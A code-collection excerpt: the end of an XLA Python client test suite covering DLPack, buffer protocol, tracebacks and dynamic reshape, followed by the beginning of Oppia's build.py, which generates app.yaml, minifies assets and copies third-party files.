self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
class DeviceAssignmentTest(ComputationTest):
def testSerialize(self):
shape = (3, 4)
device_assignment = xla_client.DeviceAssignment.create(
np.arange(np.prod(shape)).reshape(*shape))
self.assertEqual(device_assignment.replica_count(), shape[0])
self.assertEqual(device_assignment.computation_count(), shape[1])
serialized = device_assignment.serialize()
self.assertIsInstance(serialized, bytes)
self.assertNotEmpty(serialized)
tests.append(DeviceAssignmentTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
backends = {
"cpu": xla_client.make_cpu_client,
"gpu": xla_client.make_gpu_client,
}
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target platform.")
# pylint: disable=unnecessary-lambda
InstantiateTests(globals(), lambda: backends[FLAGS.backend]())
# pylint: enable=unnecessary-lambda
absltest.main()
|
build.py
|
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build file for production version of Oppia. Minifies JS and CSS."""
from __future__ import absolute_import # pylint: disable=import-only-modules
from __future__ import unicode_literals # pylint: disable=import-only-modules
import argparse
import collections
import fnmatch
import hashlib
import json
import os
import re
import shutil
import subprocess
import threading
import python_utils
from scripts import common
ASSETS_DEV_DIR = os.path.join('assets', '')
ASSETS_OUT_DIR = os.path.join('build', 'assets', '')
THIRD_PARTY_STATIC_DIR = os.path.join('third_party', 'static')
THIRD_PARTY_GENERATED_DEV_DIR = os.path.join('third_party', 'generated', '')
THIRD_PARTY_GENERATED_OUT_DIR = os.path.join(
'build', 'third_party', 'generated', '')
THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join('js', 'third_party.js')
MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH = os.path.join(
'js', 'third_party.min.js')
THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join('css', 'third_party.css')
MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH = os.path.join(
'css', 'third_party.min.css')
WEBFONTS_RELATIVE_DIRECTORY_PATH = os.path.join('webfonts', '')
EXTENSIONS_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('extensions', ''),
'staging_dir': os.path.join('backend_prod_files', 'extensions', ''),
'out_dir': os.path.join('build', 'extensions', '')
}
TEMPLATES_DEV_DIR = os.path.join('templates', '')
TEMPLATES_CORE_DIRNAMES_TO_DIRPATHS = {
'dev_dir': os.path.join('core', 'templates', ''),
'staging_dir': os.path.join('backend_prod_files', 'templates', ''),
'out_dir': os.path.join('build', 'templates', '')
}
WEBPACK_DIRNAMES_TO_DIRPATHS = {
'staging_dir': os.path.join('backend_prod_files', 'webpack_bundles', ''),
'out_dir': os.path.join('build', 'webpack_bundles', '')
}
# This json file contains a json object. The object's keys are file paths and
# the values are corresponded hash value. The paths need to be in posix style,
# as it is interpreted by the `url-interpolation` service, which which
# interprets the paths in this file as URLs.
HASHES_JSON_FILENAME = 'hashes.json'
HASHES_JSON_FILEPATH = os.path.join('assets', HASHES_JSON_FILENAME)
MANIFEST_FILE_PATH = os.path.join('manifest.json')
REMOVE_WS = re.compile(r'\s{2,}').sub
YUICOMPRESSOR_DIR = os.path.join(
os.pardir, 'oppia_tools', 'yuicompressor-2.4.8', 'yuicompressor-2.4.8.jar')
PARENT_DIR = os.path.abspath(os.path.join(os.getcwd(), os.pardir))
UGLIFY_FILE = os.path.join('node_modules', 'uglify-js', 'bin', 'uglifyjs')
WEBPACK_FILE = os.path.join('node_modules', 'webpack', 'bin', 'webpack.js')
WEBPACK_DEV_CONFIG = 'webpack.dev.config.ts'
WEBPACK_DEV_SOURCE_MAPS_CONFIG = 'webpack.dev.sourcemap.config.ts'
WEBPACK_PROD_CONFIG = 'webpack.prod.config.ts'
WEBPACK_PROD_SOURCE_MAPS_CONFIG = 'webpack.prod.sourcemap.config.ts'
WEBPACK_TERSER_CONFIG = 'webpack.terser.config.ts'
# Files with these extensions shouldn't be moved to build directory.
FILE_EXTENSIONS_TO_IGNORE = ('.py', '.pyc', '.stylelintrc', '.ts', '.gitkeep')
# Files with these name patterns shouldn't be moved to build directory, and will
# not be served in production. (This includes protractor.js files in
# /extensions.)
JS_FILENAME_SUFFIXES_TO_IGNORE = ('Spec.js', 'protractor.js')
JS_FILENAME_SUFFIXES_NOT_TO_MINIFY = ('.bundle.js',)
GENERAL_FILENAMES_TO_IGNORE = ('.pyc', '.stylelintrc', '.DS_Store')
JS_FILEPATHS_NOT_TO_BUILD = (
os.path.join(
'core', 'templates', 'expressions', 'parser.js'),
os.path.join('extensions', 'ckeditor_plugins', 'pre', 'plugin.js')
)
# These filepaths shouldn't be renamed (i.e. the filepath shouldn't contain
# hash).
# This is because these files don't need cache invalidation, are referenced
# from third party files or should not be moved to the build directory.
# Statically served pages from app.yaml should be here to since they don't
# need cache invalidation.
FILEPATHS_NOT_TO_RENAME = (
'*.py',
'third_party/generated/js/third_party.min.js.map',
'third_party/generated/webfonts/*',
'*.bundle.js',
'*.bundle.js.map',
'webpack_bundles/*',
)
PAGES_IN_APP_YAML = (
'webpack_bundles/about-page.mainpage.html',
'webpack_bundles/contact-page.mainpage.html',
'webpack_bundles/donate-page.mainpage.html',
'webpack_bundles/get-started-page.mainpage.html',
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
'webpack_bundles/privacy-page.mainpage.html',
'webpack_bundles/playbook.mainpage.html',
'webpack_bundles/teach-page.mainpage.html',
'webpack_bundles/terms-page.mainpage.html',
'webpack_bundles/thanks-page.mainpage.html'
)
# NOTE: These pages manage user sessions. Thus, we should never reject or
# replace them when running in maintenance mode; otherwise admins will be unable
# to access the site.
AUTH_PAGE_PATHS = (
'webpack_bundles/login-page.mainpage.html',
'webpack_bundles/logout-page.mainpage.html',
)
# Hashes for files with these paths should be provided to the frontend in
# JS hashes object.
FILEPATHS_PROVIDED_TO_FRONTEND = (
'images/*', 'videos/*', 'i18n/*', '*.component.html',
'*_directive.html', '*.directive.html',
'*.template.html', '*.png', '*.json', '*.webp')
HASH_BLOCK_SIZE = 2**20
APP_DEV_YAML_FILEPATH = 'app_dev.yaml'
APP_YAML_FILEPATH = 'app.yaml'
_PARSER = argparse.ArgumentParser(
description="""
Creates a third-party directory where all the JS and CSS dependencies are
built and stored. Depending on the options passed to the script, might also
minify third-party libraries and/or generate a build directory.
""")
_PARSER.add_argument(
'--prod_env', action='store_true', default=False, dest='prod_env')
_PARSER.add_argument(
'--deploy_mode', action='store_true', default=False, dest='deploy_mode')
_PARSER.add_argument(
'--minify_third_party_libs_only', action='store_true', default=False,
dest='minify_third_party_libs_only')
_PARSER.add_argument(
'--deparallelize_terser',
action='store_true',
default=False,
dest='deparallelize_terser',
help='Disable parallelism on terser plugin in webpack. Use with prod_env.')
_PARSER.add_argument(
'--maintenance_mode',
action='store_true',
default=False,
dest='maintenance_mode',
help=(
'Enable maintenance mode, '
'meaning that only super admins can access the site.'
)
)
_PARSER.add_argument(
'--source_maps',
action='store_true',
default=False,
dest='source_maps',
help='Build webpack with source maps.')
def generate_app_yaml(deploy_mode=False, maintenance_mode=False):
"""Generate app.yaml from app_dev.yaml.
Args:
deploy_mode: bool. Whether the script is being called from deploy
script.
maintenance_mode: bool. Whether the site should be put into
maintenance mode.
"""
prod_file_prefix = 'build/'
maintenance_page_path = 'webpack_bundles/maintenance-page.mainpage.html'
content = '# THIS FILE IS AUTOGENERATED, DO NOT MODIFY\n'
with python_utils.open_file(APP_DEV_YAML_FILEPATH, 'r') as yaml_file:
content += yaml_file.read()
for file_path in PAGES_IN_APP_YAML:
if maintenance_mode and file_path not in AUTH_PAGE_PATHS:
content = content.replace(
file_path, prod_file_prefix + maintenance_page_path)
else:
content = content.replace(
file_path, prod_file_prefix + file_path)
if deploy_mode:
# The version: default line is required to run jobs on a local server (
# both in prod & non-prod env). This line is not required when app.yaml
# is generated during deployment. So, we remove this if the build
# process is being run from the deploy script.
content = content.replace('version: default', '')
# The FIREBASE_AUTH_EMULATOR_HOST environment variable is only needed to
# test locally, and MUST NOT be included in the deployed file.
content = re.sub(' FIREBASE_AUTH_EMULATOR_HOST: ".*"\n', '', content)
if os.path.isfile(APP_YAML_FILEPATH):
os.remove(APP_YAML_FILEPATH)
with python_utils.open_file(APP_YAML_FILEPATH, 'w+') as prod_yaml_file:
prod_yaml_file.write(content)
def modify_constants(
prod_env=False, emulator_mode=True, maintenance_mode=False):
"""Modify constants.ts and feconf.py.
Args:
prod_env: bool. Whether the server is started in prod mode.
emulator_mode: bool. Whether the server is started in emulator mode.
maintenance_mode: bool. Whether the site should be put into
the maintenance mode.
"""
dev_mode_variable = (
'"DEV_MODE": false' if prod_env else '"DEV_MODE": true')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"DEV_MODE": (true|false)',
dev_mode_variable)
emulator_mode_variable = (
'"EMULATOR_MODE": true' if emulator_mode else '"EMULATOR_MODE": false')
common.inplace_replace_file(
common.CONSTANTS_FILE_PATH,
r'"EMULATOR_MODE": (true|false)',
emulator_mode_variable
)
enable_maintenance_mode_variable = (
'ENABLE_MAINTENANCE_MODE = %s' % python_utils.UNICODE(maintenance_mode))
common.inplace_replace_file(
common.FECONF_PATH,
r'ENABLE_MAINTENANCE_MODE = (True|False)',
enable_maintenance_mode_variable)
def set_constants_to_default():
"""Set variables in constants.ts and feconf.py to default values."""
modify_constants(prod_env=False, emulator_mode=True, maintenance_mode=False)
def _minify(source_path, target_path):
"""Runs the given file through a minifier and outputs it to target_path.
Args:
source_path: str. Absolute path to file to be minified.
target_path: str. Absolute path to location where to copy
the minified file.
"""
# The -Xmxn argument is an attempt to limit the max memory used when the
# minification process is running on CircleCI. Note that, from local
# experiments, 18m seems to work, but 12m is too small and results in an
# out-of-memory error.
# https://circleci.com/blog/how-to-handle-java-oom-errors/
# Use relative path to avoid java command line parameter parse error on
# Windows. Convert to posix style path because the java program requires
# the filepath arguments to be in posix path style.
target_path = common.convert_to_posixpath(
os.path.relpath(target_path))
source_path = common.convert_to_posixpath(
os.path.relpath(source_path))
yuicompressor_dir = common.convert_to_posixpath(YUICOMPRESSOR_DIR)
cmd = 'java -Xmx24m -jar %s -o %s %s' % (
yuicompressor_dir, target_path, source_path)
subprocess.check_call(cmd, shell=True)
def write_to_file_stream(file_stream, content):
"""Write to a file object using provided content.
Args:
file_stream: file. A stream handling object to do write operation on.
content: str. String content to write to file object.
"""
file_stream.write(python_utils.UNICODE(content))
def _join_files(source_paths, target_file_stream):
"""Writes multiple files into one file.
Args:
source_paths: list(str). Paths to files to join together.
target_file_stream: file. A stream object of target file.
"""
for source_path in source_paths:
with python_utils.open_file(source_path, 'r') as source_file:
write_to_file_stream(target_file_stream, source_file.read())
def _minify_and_create_sourcemap(source_path, target_file_path):
"""Minifies and generates source map for a JS file. This function is only
meant to be used with third_party.min.js.
Args:
source_path: str. Path to JS file to minify.
target_file_path: str. Path to location of the minified file.
"""
python_utils.PRINT('Minifying and creating sourcemap for %s' % source_path)
source_map_properties = 'includeSources,url=\'third_party.min.js.map\''
cmd = '%s %s %s -c -m --source-map %s -o %s ' % (
common.NODE_BIN_PATH, UGLIFY_FILE, source_path,
source_map_properties, target_file_path)
subprocess.check_call(cmd, shell=True)
def _generate_copy_tasks_for_fonts(source_paths, target_path):
"""Queue up a copy task for each font file.
Args:
source_paths: list(str). Paths to fonts.
target_path: str. Path where the fonts should be copied.
Returns:
deque(Thread). A deque that contains all copy tasks queued to be
processed.
"""
copy_tasks = collections.deque()
for font_path in source_paths:
copy_task = threading.Thread(
target=shutil.copy,
args=(font_path, target_path,))
copy_tasks.append(copy_task)
return copy_tasks
def _insert_hash(filepath, file_hash):
"""Inserts hash into filepath before the file extension.
Args:
filepath: str. Path where the hash should be inserted.
file_hash: str. Hash to be inserted into the path.
Returns:
str. Filepath with hash inserted.
"""
filepath, file_extension = os.path.splitext(filepath)
return '%s.%s%s' % (filepath, file_hash, file_extension)
def ensure_directory_exists(filepath):
"""Ensures if directory tree exists, if not creates the directories.
Args:
filepath: str. Path to file located in directory that we want to ensure
exists.
"""
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
def safe_delete_directory_tree(directory_path):
"""Recursively delete a directory tree. If directory tree does not exist,
create the directories first then delete the directory tree.
Args:
directory_path: str. Directory path to be deleted.
"""
ensure_directory_exists(directory_path)
shutil.rmtree(directory_path)
def _ensure_files_exist(filepaths):
"""Ensures that files exist at the given filepaths.
Args:
filepaths: list(str). Paths to files that we want to ensure exist.
Raises:
OSError. One or more of the files does not exist.
"""
for filepath in filepaths:
if not os.path.isfile(filepath):
raise OSError('File %s does not exist.' % filepath)
def safe_copy_file(source_filepath, target_filepath):
"""Copy a file (no metadata) after ensuring the file exists at the given
source filepath.
NOTE: shutil.copyfile does not accept directory path as arguments.
Args:
source_filepath: str. Path to source file that we want to copy from.
target_filepath: str. Path to target file that we want to copy to.
"""
_ensure_files_exist([source_filepath])
shutil.copyfile(source_filepath, target_filepath)
def safe_delete_file(filepath):
"""Delete a file after ensuring the provided file actually exists.
Args:
filepath: str. Filepath to be deleted.
"""
_ensure_files_exist([filepath])
os.remove(filepath)
def get_file_count(directory_path):
"""Count total number of file in the given directory, ignoring any files
with extensions in FILE_EXTENSIONS_TO_IGNORE or files that should not be
built.
Args:
directory_path: str. Directory to be walked.
Returns:
int. Total number of files minus ignored files.
"""
total_file_count = 0
for root, _, filenames in os.walk(directory_path):
for filename in filenames:
# Ignore files with certain extensions.
filepath = os.path.join(root, filename)
if should_file_be_built(filepath) and not any(
filename.endswith(p) for p in FILE_EXTENSIONS_TO_IGNORE):
total_file_count += 1
return total_file_count
def _compare_file_count(
first_dir_list, second_dir_list):
"""Ensure that the total count of files in all directories in the first
list matches the count of files in all the directories in the second list.
Args:
first_dir_list: list(str). List of directories to compare.
second_dir_list: list(str). List of directories to compare.
Raises:
ValueError. The source directory list does not have the same file
count as the target directory list.
"""
file_counts = [0, 0]
for first_dir_path in first_dir_list:
file_counts[0] += get_file_count(first_dir_path)
for second_dir_path in second_dir_list:
file_counts[1] += get_file_count(second_dir_path)
if file_counts[0] != file_counts[1]:
python_utils.PRINT(
'Comparing %s vs %s' % (first_dir_list, second_dir_list))
raise ValueError(
'%s files in first dir list != %s files in second dir list' % (
file_counts[0], file_counts[1]))
def process_html(source_file_stream, target_file_stream):
"""Remove whitespaces and add hashes to filepaths in the HTML file stream
object.
Args:
source_file_stream: file. The stream object of the HTML file to be
read from.
target_file_stream: file. The stream object to write the minified HTML
file to.
"""
write_to_file_stream(
target_file_stream, REMOVE_WS(' ', source_file_stream.read()))
def get_dependency_directory(dependency):
"""Get dependency directory from dependency dictionary.
Args:
dependency: dict(str, str). Dictionary representing single dependency
from manifest.json.
Returns:
str. Dependency directory.
"""
if 'targetDir' in dependency:
dependency_dir = dependency['targetDir']
else:
dependency_dir = dependency['targetDirPrefix'] + dependency['version']
return os.path.join(THIRD_PARTY_STATIC_DIR, dependency_dir)
def get_css_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency css filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to css files that need to be copied.
"""
css_files = dependency_bundle.get('css', [])
return [os.path.join(dependency_dir, css_file) for css_file in css_files]
def get_js_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency js filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to js files that need to be copied.
"""
js_files = dependency_bundle.get('js', [])
return [os.path.join(dependency_dir, js_file) for js_file in js_files]
def get_font_filepaths(dependency_bundle, dependency_dir):
"""Gets dependency font filepaths.
Args:
dependency_bundle: dict(str, list(str) | str). The dict has three keys:
- 'js': List of paths to js files that need to be copied.
- 'css': List of paths to css files that need to be copied.
- 'fontsPath': Path to folder containing fonts that need to be
copied.
dependency_dir: str. Path to directory where the files that need to
be copied are located.
Returns:
list(str). List of paths to font files that need to be copied.
"""
if 'fontsPath' not in dependency_bundle:
# Skip dependency bundles in manifest.json that do not have
# fontsPath property.
return []
fonts_path = dependency_bundle['fontsPath']
# Obtain directory path to /font inside dependency folder.
# E.g. third_party/static/bootstrap-3.3.4/fonts/.
font_dir = os.path.join(dependency_dir, fonts_path)
font_filepaths = []
# Walk the directory and add all font files to list.
for root, _, filenames in os.walk(font_dir):
for filename in filenames:
font_filepaths.append(os.path.join(root, filename))
return font_filepaths
def get_dependencies_filepaths():
"""Extracts dependencies filepaths from manifest.json file into
a dictionary.
Returns:
dict(str, list(str)). A dict mapping file types to lists of filepaths.
The dict has three keys: 'js', 'css' and 'fonts'. Each of the
corresponding values is a full list of dependency file paths of the
given type.
"""
filepaths = {
'js': [],
'css': [],
'fonts': []
}
with python_utils.open_file(MANIFEST_FILE_PATH, 'r') as json_file:
manifest = json.loads(
json_file.read(), object_pairs_hook=collections.OrderedDict)
frontend_dependencies = manifest['dependencies']['frontend']
for dependency in frontend_dependencies.values():
if 'bundle' in dependency:
dependency_dir = get_dependency_directory(dependency)
filepaths['css'].extend(
get_css_filepaths(dependency['bundle'], dependency_dir))
filepaths['js'].extend(
get_js_filepaths(dependency['bundle'], dependency_dir))
filepaths['fonts'].extend(
get_font_filepaths(dependency['bundle'], dependency_dir))
_ensure_files_exist(filepaths['js'])
_ensure_files_exist(filepaths['css'])
_ensure_files_exist(filepaths['fonts'])
return filepaths
def minify_third_party_libs(third_party_directory_path):
"""Minify third_party.js and third_party.css and remove un-minified
files.
"""
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
minified_third_party_js_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_JS_RELATIVE_FILEPATH)
minified_third_party_css_filepath = os.path.join(
third_party_directory_path, MINIFIED_THIRD_PARTY_CSS_RELATIVE_FILEPATH)
_minify_and_create_sourcemap(
third_party_js_filepath, minified_third_party_js_filepath)
_minify(third_party_css_filepath, minified_third_party_css_filepath)
# Clean up un-minified third_party.js and third_party.css.
safe_delete_file(third_party_js_filepath)
safe_delete_file(third_party_css_filepath)
def build_third_party_libs(third_party_directory_path):
"""Joins all third party css files into single css file and js files into
single js file. Copies both files and all fonts into third party folder.
"""
python_utils.PRINT(
'Building third party libs at %s' % third_party_directory_path)
third_party_js_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_JS_RELATIVE_FILEPATH)
third_party_css_filepath = os.path.join(
third_party_directory_path, THIRD_PARTY_CSS_RELATIVE_FILEPATH)
webfonts_dir = os.path.join(
third_party_directory_path, WEBFONTS_RELATIVE_DIRECTORY_PATH)
dependency_filepaths = get_dependencies_filepaths()
ensure_directory_exists(third_party_js_filepath)
with python_utils.open_file(
third_party_js_filepath, 'w+') as third_party_js_file:
_join_files(dependency_filepaths['js'], third_party_js_file)
ensure_directory_exists(third_party_css_filepath)
with python_utils.open_file(
